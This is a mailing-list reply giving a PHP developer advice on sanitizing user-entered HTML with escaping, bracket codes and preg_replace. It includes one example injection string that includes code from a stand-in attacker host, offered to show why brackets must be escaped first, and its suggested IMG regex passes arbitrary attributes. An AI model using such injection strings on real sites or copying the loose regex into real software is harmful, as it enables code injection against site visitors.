> I'm developing a web application with PHP and MySQL for data entry. I need > to "sanitize" the HTML that my users enter (i.e. remove all HTML tags > except for BR, P, IMG, etc.). I've been trying to use a regular expression > to do this, but it's not working yet. Anyone have any suggestions? If I > can't do it in a single regular expression, it makes the code rather > complex. If you want to do it simply, you might be better off borrowing a strategy from UBB -- remove *all* HTML codes (or globally convert < and > to < and >), convert newlines to <BR>, and give your users the option to use "approved" tags by enclosing them in square brackets or something. i.e. [IMG="/path/to/image"] is easily handled by $output=preg_replace("/\[IMG (.+)\]/", "<IMG \\1>", $input) (This *only* works if you globally replace brackets *first* -- otherwise, a clever user could do something like "[IMG SRC="whocares.gif"><? include "http://hax0r.com/some.random.js ?]") Trying to do it all in a single regexp may not be a good thing, as you'll almost certainly have to edit that regexp over time, and it's much easier to deal with a lot of simple regexps than a big complicated one. Check out the docs on preg_replace() -- there's actually a good recipe for what you're trying to do right on that page: http://www.php3.org/manual/function.preg-replace.php It's much more powerful than ereg_replace and its relatives. -- Eric Hillman UNIX Sysadmin/Webmaster City & County Credit Union ehillman at cccu.com --------------------------------------------------------------------- To unsubscribe, e-mail: tclug-list-unsubscribe at mn-linux.org For additional commands, e-mail: tclug-list-help at mn-linux.org